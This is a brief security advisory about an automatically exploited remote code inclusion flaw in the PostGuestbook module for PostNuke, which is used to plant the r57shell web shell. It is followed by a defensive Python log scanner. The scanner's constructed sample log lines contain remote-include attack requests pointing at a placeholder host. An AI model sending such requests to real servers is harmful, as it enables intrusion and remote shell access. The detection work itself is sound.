Automated attacks on guest book module for PostNuke
Users of the PostGuestbook guest book module for PostNuke should check that their server has not fallen victim to an attack. The module appears to contain a vulnerability which, according to reports, is currently being exploited in automated intrusions. A bug in PostGuestbook appears to allow attackers to have their own PHP code loaded from remote servers and executed on the victim's server. In the case at hand, a 'PHP shell' (r57shell) is downloaded, which allows shell access via the web server. Some systems appear to have been compromised already, with at least the home page having been defaced.
The automated attack uses the Google search engine to find vulnerable servers. The referrer passed to the victims' systems suggests Arabic origins. The bug is in version 0.6.1 of the guest book, which is nearly two years old. No new version is available. It is not known whether further conditions, such as register_globals=on, must be met for an attack to succeed, or what those conditions might be. The only known remedy at present is to deactivate the guest book module in PostNuke.
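
One way to carry out the check recommended above, as an added example that is not part of the original report: scan the web server's access log for requests that touch the guest book module and pass a remote URL as a parameter value. The combined log format, the module name appearing in the request, and all sample lines and parameter names are assumptions constructed for illustration; the report does not name the vulnerable parameter.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache/nginx "combined" format; the referer field is kept for the analyst.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)")?'
)
REMOTE_URL = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)
MODULE = "postguestbook"  # assumption: the module name shows up in path or query


def suspicious_requests(lines):
    """Flag requests that touch the guest book module and pass a remote URL
    as a parameter value, the usual trace of a remote-include attempt."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or MODULE not in unquote(m["target"]).lower():
            continue
        query = urlsplit(m["target"]).query
        # parse_qsl decodes once; unquote again to catch double encoding.
        hits = [k for k, v in parse_qsl(query, keep_blank_values=True)
                if REMOTE_URL.match(unquote(v))]
        if hits:
            findings.append({"host": m["host"], "time": m["time"],
                             "status": int(m["status"]), "params": hits,
                             "referer": m["referer"] or ""})
    return findings


# Constructed sample lines (documentation addresses, placeholder parameter name).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2007:10:00:00 +0000] "GET /index.php?module=PostGuestbook&func=view HTTP/1.1" 200 5120 "-" "example-agent"',
    '198.51.100.7 - - [01/Jan/2007:10:02:13 +0000] "GET /modules/PostGuestbook/sample.php?param=http://files.example.invalid/x.txt? HTTP/1.1" 200 310 "http://www.google.com/search?q=guestbook" "example-agent"',
    '198.51.100.7 - - [01/Jan/2007:10:02:15 +0000] "GET /modules/PostGuestbook/sample.php?param=ftp%3A%2F%2Ffiles.example.invalid%2Fx.txt HTTP/1.1" 404 210 "-" "example-agent"',
    '203.0.113.5 - - [01/Jan/2007:10:05:00 +0000] "GET /index.php?module=News&url=http://example.invalid/ HTTP/1.1" 200 900 "-" "example-agent"',
]

if __name__ == "__main__":
    for finding in suspicious_requests(SAMPLE_LOG):
        print(finding)
```

A finding records an attempt rather than a confirmed compromise; a 200 status only means the request was served.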